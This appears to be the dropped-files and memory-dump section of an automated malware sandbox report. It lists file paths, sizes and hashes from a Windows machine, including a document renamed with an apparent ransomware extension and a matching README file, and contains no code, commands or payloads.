C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
13aec4481db5d269cc359123d90f8ad9

SHA1
96aabfa33410e6e26579bce2b2964475bec9c500

SHA256
a416e5734110f4d0afd27465278b608e31c7583e35ee0ea233206c8aef438fb8

SHA512
0b64c667db1aa5b16931c6b792d2f5d7689dcd3c9fe678fbbaa07d43359b47ee89382946a84609a7b8e5121f4658fe72e9e01b8ace3b836bf82eea9aeab5d782

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
44d7a1d19862d7b1b7772d2ce61af593

SHA1
b36fd79318764437f08ce34dba31e1e754ddadca

SHA256
78fc0a5696c15c0c4d92dc2b94ddeeb166265114be9f9470ffe88233e265bf77

SHA512
70a4c060041173a19f151e3dd01342a4ccc6ad496d22a796b6a617e21af20ff5fa15b6df4d2a6dcc091a761dc6bc8f35d2641bcf2a18161d5f66a76812e7d17c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
3b0049678ff9339ee099b7f2480856aa

SHA1
42a3bbac81d9e183e9bc59a16745e02409d6a84f

SHA256
2294c64c23d7993b2ca5a5fc2a0a659ef2adbe68079f96c5eab33dd62a51bd8a

SHA512
58b5e5d44378e8d676135ddf6b3bbc30b41f7bc8aa153b834258a5009731a6d855dd7d335ff0737f660c0c14d574bd31cb5704e2d5fd73b6ba88f1b275bb505a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache\data_0

Filesize
8KB

MD5
cf89d16bb9107c631daabf0c0ee58efb

SHA1
3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

SHA256
d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

SHA512
8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache\data_3

Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
3KB

MD5
31ed17c7b7effa5ae1dc45ca3679dd58

SHA1
7fc61381ff48e83edf277ebf4d3376a4584ad30f

SHA256
87f57427b4b8c3cbe2e13962de3afb9aaf2af997cd076d39e791e34e66f091e8

SHA512
3a546b7df54250aafeaa89462b567aa58633e74ebbd0f9b88fc44b7efb7d8349baa170ab31e114d7d1ded5c8a47d90c4078ece981862acdc42cc941d76002943

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State~RFe5865ba.TMP

Filesize
1KB

MD5
6bab4895b53d5818f2322804fee3b241

SHA1
eb70a7e1574add1471f5c17f98dcbc6cb7e75bd5

SHA256
4b12e226999342400f158fed0d04de543d2e54172afd5cef85b2ccf305e49295

SHA512
be0cf22fdf4407313743445eefbf3de0e830bb644931dd21b2850a06cd53f9d51ae04b3d96835cd4aeed1e81426c1281225c769635578da590cb81e0f886f497

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_500yurfm.e4y.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\DDDDDDDDDD

Filesize
147KB

MD5
c729a7953c9ada6bb3e19070f020f794

SHA1
9afbdf79a59e8fce4648f4f331eea2d2e2ac9eab

SHA256
f7cfe15df56e80d079f441b270986e498bd20424b1aa0ffe2bbd17e7aaf7413c

SHA512
42a4faae88dd0da825285d4b22c6d39c250549dcc99a4393b7cb9f47b8c4b9627f78911dc4323fc1971d6bc1a6d07429ac6aa561afd149802d2106a3daf4f5a0

Download Submit
C:\Users\Admin\Desktop\ProtectSplit.docx.xP8S4N9J1

Filesize
555KB

MD5
e574bc7e2074970dab588a6e12f0ff14

SHA1
274a1b54d464bd1e021f9ef777b1ae2837da2fa2

SHA256
9899b0e2a1ae0593304ff973a20318071805a83340a79b59166b4a8cd650f564

SHA512
fc2b6c76ab08556ceb69b612d419ee3cd5704fa9e8a25d003dc202d3167fa07884650ce39d3d9604080bfc3ad0049b861d0bb182213e9ab050f0c3eec36b6fdd

Download Submit
C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2

Filesize
4KB

MD5
cd2cc63ac254e42734843b5a9c293779

SHA1
c2325041c06d505c5b4d7424132fcddd48d22ce3

SHA256
06e6633465792362a7f2d0139084889bab0fb1389959440a78fedbdb66b502f4

SHA512
2765b98b095448cfc240af81984909f5efe58fd3a6c695d47e21c95be6211ff8f810fc727fe73d1c3a1f8aa7b80b384364bb3f89454f2df60d01c754d05cb965

Download Submit
C:\xP8S4N9J1.README.txt

Filesize
1KB

MD5
c283c63ae856a725b5e4f127156e4cf6

SHA1
d8d9b6f436f2495f52eb248f05998835fc71738d

SHA256
9bcbb2fc5d4124bce953bda76499c9a1ddf81a7befb06dd1c0294bedd3c9ba4b

SHA512
3a07269c7de4a3ce862aa8f15014bab2f39497c1be0359fd34b2ecb4f417dd9cdcb43c249d7f80563d2facedaece9741310f5e8cd452e15c508e02098be9d0e2

Download Submit
F:\$RECYCLE.BIN\S-1-5-21-3350944739-639801879-157714471-1000\DDDDDDDDDDD

Filesize
129B

MD5
053ccda1469ac0c502917b94a4d97e77

SHA1
7031ec1aa6a0df5921bfabc5fff50cb96d3f13ba

SHA256
243ea1fc0a37a13a7506e20068d8c5a810e4c035b134dd7be58d80eab7aa2e2a

SHA512
0321d4f7c7e21a3db5f4469f84d03dd7b1d12d65005d73d869226beae441639964abcf4dff84ee27a34b0bf846d37628dfc1fdfc84684d6254788dec5cd4306a

Download Submit
memory/1224-1-0x0000017415100000-0x0000017415122000-memory.dmp

Filesize
136KB

Download
memory/1224-11-0x00007FF83CB50000-0x00007FF83D611000-memory.dmp

Filesize
10.8MB

Download
memory/1224-12-0x00007FF83CB50000-0x00007FF83D611000-memory.dmp

Filesize
10.8MB

Download
memory/1224-13-0x000001742FB60000-0x000001742FD22000-memory.dmp

Filesize
1.8MB

Download
memory/1224-0-0x00007FF83CB53000-0x00007FF83CB55000-memory.dmp

Filesize
8KB

Download
memory/1224-22-0x00007FF83CB50000-0x00007FF83D611000-memory.dmp

Filesize
10.8MB

Download
memory/4864-2880-0x00007FF818C60000-0x00007FF818C70000-memory.dmp

Filesize
64KB

Download
memory/4864-2841-0x00007FF81ADD0000-0x00007FF81ADE0000-memory.dmp

Filesize
64KB

Download
memory/4864-2842-0x00007FF81ADD0000-0x00007FF81ADE0000-memory.dmp

Filesize
64KB

Download
memory/4864-2843-0x00007FF81ADD0000-0x00007FF81ADE0000-memory.dmp

Filesize
64KB

Download
memory/4864-2845-0x00007FF81ADD0000-0x00007FF81ADE0000-memory.dmp

Filesize
64KB

Download
memory/4864-2846-0x00007FF81ADD0000-0x00007FF81ADE0000-memory.dmp

Filesize
64KB

Download
memory/4864-2851-0x00007FF818C60000-0x00007FF818C70000-memory.dmp

Filesize
64KB

Download
memory/4864-2920-0x00007FF81ADD0000-0x00007FF81ADE0000-memory.dmp

Filesize
64KB

Download
memory/4864-2921-0x00007FF81ADD0000-0x00007FF81ADE0000-memory.dmp

Filesize
64KB

Download
memory/4864-2919-0x00007FF81ADD0000-0x00007FF81ADE0000-memory.dmp

Filesize
64KB

Download
memory/4864-2918-0x00007FF81ADD0000-0x00007FF81ADE0000-memory.dmp

Filesize
64KB

Download